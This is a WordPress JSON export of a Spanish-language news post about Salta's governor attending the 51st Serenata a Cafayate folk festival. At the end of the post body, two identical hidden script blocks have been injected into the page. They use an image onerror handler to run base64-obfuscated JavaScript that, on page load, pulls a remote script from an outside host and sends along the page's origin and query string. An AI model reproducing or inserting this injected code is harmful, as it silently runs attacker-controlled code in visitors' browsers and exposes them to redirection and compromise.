{"id":4878,"date":"2025-02-24T10:39:39","date_gmt":"2025-02-24T13:39:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4878"},"modified":"2025-08-13T23:39:57","modified_gmt":"2025-08-14T02:39:57","slug":"el-gobernador-compartio-con-miles-de-saltenos-y-turistas-la-51-edicion-de-la-serenata-a-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4878","title":{"rendered":"El Gobernador comparti\u00f3 con miles de salte\u00f1os y turistas la 51\u00b0 edici\u00f3n de la Serenata a Cafayate"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4d325c8f29fe6221be33a3926e8d2cf5\" style=\"background-color:#77053e\"><em>El mandatario estuvo en el predio de Payo Sol\u00e1 para sumarse al festival folcl\u00f3rico m\u00e1s importante del norte. \u201cEs una fiesta que nos une y representa el alma de nuestra tierra\u201d, expres\u00f3.<\/em><\/h4>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;comparti\u00f3 con miles de salte\u00f1os y turistas la tercera y \u00faltima velada de la edici\u00f3n 2025 de la mayor fiesta del folclore en Salta que ya cuenta con de 51 a\u00f1os &nbsp;de historia. &nbsp;<\/p>\n\n\n\n<p>\u201cEs una fiesta que nos une y representa el alma de nuestra tierra. Es identidad y tradici\u00f3n. Representa a Salta y a nuestra gente\u201d, indic\u00f3 S\u00e1enz.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16138-gustavo-saenz-junto-a-la-intendenta-cafayatenia-rita-guevara-con-los-medios-de-prensa.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16138-gustavo-saenz-junto-a-la-intendenta-cafayatenia-rita-guevara-con-los-medios-de-prensa.webp\" alt=\"Gustavo S\u00e1enz junto a la intendenta cafayate\u00f1a, Rita Guevara, con los medios de prensa.\"\/><\/a><\/figure>\n\n\n\n<p>En contacto con los medios agreg\u00f3: \u201cEmociona llegar a Cafayate en esta fecha y ver c\u00f3mo ha crecido\u201d. \u201cEntendemos que esta es la forma de hacer pol\u00edtica: trabajando por la gente, en cercan\u00eda con ellos; con compromiso, responsabilidad y ganas que Salta siga creciendo\u201d, afirm\u00f3.&nbsp;<\/p>\n\n\n\n<p>Igualmente la intendenta de Cafayate\u00a0<strong>Rita Guevara<\/strong>\u00a0agradeci\u00f3 el permanente acompa\u00f1amiento y apoyo de la gesti\u00f3n de\u00a0<strong>Gustavo S\u00e1enz\u00a0<\/strong>que, con visi\u00f3n federal, hizo realidad el Centro de Convenciones en la localidad, Potencia, la pr\u00f3xima sede de Upateco\u00a0y obras de infraestructura urbana.<\/p>\n\n\n\n<p>Como todos los a\u00f1os, en esta nueva edici\u00f3n, el escenario de Payo Sol\u00e1 abri\u00f3 sus puertas durante tres lunas cafayate\u00f1as a los m\u00e1s destacados representantes de la m\u00fasica, cultura y tradici\u00f3n.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"4879\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate.webp\" alt=\"\" class=\"wp-image-4879\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate.webp 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate-768x512.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate-630x420.webp 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10735-serenata-a-cafayate-696x464.webp 696w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"4880\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate.webp\" alt=\"\" class=\"wp-image-4880\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate.webp 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate-768x512.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate-630x420.webp 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10737-serenata-a-cafayate-696x464.webp 696w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"903\" height=\"600\" data-id=\"4881\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate.webp\" alt=\"\" class=\"wp-image-4881\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate.webp 903w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate-300x199.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate-768x510.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate-632x420.webp 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10738-serenata-a-cafayate-696x462.webp 696w\" sizes=\"(max-width: 903px) 100vw, 903px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Por la Bodega Encantada pasaron artistas de la talla de Bruno Arias, Lucio Rojas, Christian Herrera, L\u00e1zaro Caballero, Jorge Rojas, Ahyre, Sergio Galleguillo, entre otros.<\/p>\n\n\n\n<p>Brillaron en el cierre Andares, Lorena Carpanchay, Jacinta Condori, Mariana Cay\u00f3n, Mariana Carrizo, Las Voces de Or\u00e1n, Tuc\u00e1n y chaya, Los de Cafayate, Franco Barrionuevo, El Tolombe\u00f1o, Iv\u00e1n Ruiz, Las 4 cuerdas y el Chaque\u00f1o Palavecino.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16139-la-gran-noche-cafayatenia-en-otra-jornada-destacada-de-la-serenata-a-cafayate-con-representantes-de-la-musica-y-el-baile-tradicional.webp\" alt=\"\" style=\"width:270px;height:auto\"\/><\/figure><\/div>\n\n\n<p>La Serenata a Cafayate es uno de los festivales destacados dentro del calendario de verano con una grilla art\u00edstica de primer nivel, que se suma a las diversas actividades que se desarrollan a lo largo y ancho de la provincia y conforman la enriquecedora oferta tur\u00edstica que tiene Salta para ofrecer a sus visitantes.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Gobernador comparti\u00f3 con miles de salte\u00f1os y turistas la 51\u00b0 edici\u00f3n de la Serenata a Cafayate\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/sIjldF5MBFk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mandatario estuvo en el predio de Payo Sol\u00e1 para sumarse al festival folcl\u00f3rico m\u00e1s importante del norte. \u201cEs una fiesta que nos une y representa el alma de nuestra tierra\u201d, expres\u00f3. El gobernador&nbsp;Gustavo S\u00e1enz&nbsp;comparti\u00f3 con miles de salte\u00f1os y turistas la tercera y \u00faltima velada de la edici\u00f3n 2025 de la mayor fiesta del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4880,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4878","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4878"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4878"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions"}],"predecessor-version":[{"id":6563,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4878\/revisions\/6563"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4880"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}